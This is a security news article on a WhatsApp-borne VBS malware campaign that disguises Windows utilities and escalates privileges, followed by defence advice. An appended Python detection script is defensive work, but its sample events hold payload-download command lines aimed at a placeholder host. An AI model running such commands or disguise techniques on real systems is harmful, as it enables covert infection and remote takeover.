A sophisticated new malware campaign is actively leveraging WhatsApp to distribute malicious files directly to Windows users, exploiting the platform’s widespread trust and familiarity. Threat actors are sending Visual Basic Script (VBS) files through WhatsApp messages, preying on the likelihood that recipients will open attachments from seemingly safe sources. Once executed, these files initiate a silent infection process in the background, operating without any visible alerts to the unsuspecting user.
This campaign is notable for its stealthy approach, employing “living-off-the-land” techniques that utilize legitimate Windows tools. Threat actors are renaming standard utilities like curl.exe and bitsadmin.exe to mimic system files and embedding them within hidden folders in C:\ProgramData. Subsequent malicious payloads are then downloaded from trusted cloud services such as AWS S3, Tencent Cloud, and Backblaze B2, making the illicit downloads appear as routine system activity, according to findings by the Microsoft Defender Security Research Team in late February 2026.
Exploiting WhatsApp for Malware Delivery: A Stealthy Attack Chain
The discovered malware operation combines social engineering with advanced infection techniques designed for maximum stealth. It operates through multiple stages to deploy malicious MSI packages, establish persistence, and ultimately open remote access channels for attackers. These MSI packages, including Setup.msi, WinRAR.msi, LinkPoint.msi, and AnyDesk.msi, are delivered without valid code-signing certificates, a significant deviation from what is typically seen with legitimate enterprise software.
The attack chain commences when a user inadvertently executes a malicious VBS file received via WhatsApp. The script then creates hidden directories within C:\ProgramData and places renamed versions of Windows utilities, such as curl.exe disguised as netapi.dll and bitsadmin.exe as sc.exe. Crucially, even with these name changes, the files retain their original PE metadata, including the OriginalFileName field. This discrepancy between the displayed filename and the embedded metadata can serve as a detection vector for security tools.
These disguised tools are then used to download secondary VBS payloads from cloud-hosted infrastructure belonging to the attackers. Files named auxs.vbs and WinUpdate_KB5034231.vbs are hosted on widely recognized platforms like AWS S3 and Backblaze B2. This strategy is effective because corporate firewalls are less likely to block traffic to these services, and the file names are deliberately chosen to resemble legitimate Windows update packages, further minimizing suspicion.
Bypassing User Account Control and Establishing Persistence
Upon execution of the secondary scripts, the malware begins actively attempting to elevate its privileges by tampering with User Account Control (UAC) settings. It repeatedly attempts to run cmd.exe with administrative rights, modifying registry entries under HKLM\Software\Microsoft\Win until elevated permissions are secured. Once administrative rights are obtained, the malware suppresses security prompts, ensuring that the final MSI installers are executed without triggering any alerts that might inform the user or an IT administrator of the ongoing compromise.
The ultimate goal of this malware campaign is to establish persistent remote access to the compromised systems. This gives attackers the ability to exfiltrate sensitive data, deploy further malicious software, or use the compromised machine as a pivot point for broader attack operations. The unsigned nature of the final MSI installers is a critical indicator of their malicious intent, as trusted software typically carries a valid digital signature from a reputable publisher.
Defense Strategies Against this Advanced WhatsApp Cyber Threat
Microsoft recommends several key defense strategies to mitigate the risk posed by this evolving WhatsApp attack chain. Organizations should consider blocking script hosts, such as wscript and cscript, from executing in untrusted locations and monitor for renamed Windows utilities that are launched with unusual command-line flags. Furthermore, security teams should inspect and filter outbound traffic to cloud platforms like AWS S3, Tencent Cloud, and Backblaze B2, as these are frequently used by attackers for payload delivery.
Real-time monitoring of registry changes under HKLM\Software\Microsoft\Win is also advised, and any repeated attempts to tamper with UAC should be flagged as potential indicators of compromise. Enabling Endpoint Detection and Response (EDR) in block mode is crucial, as it can neutralize malicious artifacts even if conventional antivirus solutions fail to detect them. Activating tamper protection can prevent attackers from disabling critical security services post-compromise.
Implementing attack surface reduction rules to block VBScript from initiating the execution of downloaded executables adds another vital layer of defense. However, one of the most effective initial defenses remains user education. Training end-users to critically evaluate and question unexpected attachments received via WhatsApp, even when sent from known contacts, is paramount in preventing this sophisticated attack from initiating in the first place.
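As an added illustration (not from Microsoft's report or any published detection), the checks recommended above expressed as rules over constructed Sysmon-style events: the on-disk name versus PE OriginalFileName mismatch described in the attack chain, script hosts launched against scripts in writable locations, and registry writes under the UAC key prefix the report gives only in truncated form. Field names follow Sysmon's process-creation and registry events; the sample events, hidden folder name, user name and download host are constructed, and the full UAC policy key in the sample is the standard Windows location, assumed to be the one the report truncates.

```python
import re

# Rules over Sysmon-style events: Event 1 (process create) carries Image, OriginalFileName
# and CommandLine; Event 13 (registry value set) carries TargetObject.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
UNTRUSTED_DIRS = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
# The report gives the tampered key only as a truncated prefix; it is matched as a prefix here.
UAC_KEY_PREFIX = "hklm\\software\\microsoft\\win"
SCRIPT_PATH_RE = re.compile(r'[a-z]:\\[^"\s]+\.(?:vbs|vbe|js|wsf)\b', re.IGNORECASE)

def basename(path):
    """Last path component, lower-cased, for case-insensitive comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of every rule the event trips (empty list if clean)."""
    hits = []
    image = basename(ev.get("Image", ""))
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    # Rule 1: on-disk name disagrees with the PE's OriginalFileName (curl.exe as netapi.dll).
    # Production use needs an allowlist, since a few legitimate binaries also differ here.
    if original and image != original:
        hits.append("renamed_utility")
    # Rule 2: wscript/cscript launched against a script in a writable, untrusted directory.
    if image in SCRIPT_HOSTS and any(s.lower().startswith(UNTRUSTED_DIRS)
                                      for s in SCRIPT_PATH_RE.findall(cmd)):
        hits.append("script_host_untrusted_path")
    # Rule 3: registry value writes under the UAC policy prefix the campaign tampers with.
    if (ev.get("EventType") == "RegistryValueSet"
            and ev.get("TargetObject", "").lower().startswith(UAC_KEY_PREFIX)):
        hits.append("uac_registry_tamper")
    return hits

def detect(events):
    """(image, rule) pairs for every event that tripped a rule, in event order."""
    return [(ev["Image"], rule) for ev in events for rule in check_event(ev)]

# Constructed sample telemetry: hidden folder name, user name and download host are illustrative.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"Image": r"C:\ProgramData\.sys\netapi.dll", "OriginalFileName": "curl.exe",
     "CommandLine": r"netapi.dll -s -o C:\ProgramData\.sys\auxs.vbs https://bucket.example.invalid/auxs.vbs"},
    {"Image": r"C:\ProgramData\.sys\sc.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"sc.exe /transfer upd /download https://bucket.example.invalid/WinUpdate_KB5034231.vbs C:\ProgramData\.sys\WinUpdate_KB5034231.vbs"},
    # Standard UAC policy value; assumed to be the location the report truncates to ...\Win.
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe", "EventType": "RegistryValueSet",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"},
]
```

Running `detect(SAMPLE_EVENTS)` flags the script host, both renamed utilities and the registry write, while a genuine curl.exe or a script under C:\Windows\System32 passes clean.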
Organizations should remain vigilant for further evolution of this attack, as threat actors continuously adapt their methods. The upcoming focus will likely be on how effectively detection and prevention mechanisms are updated to counter these sophisticated stealth techniques leveraging everyday communication platforms.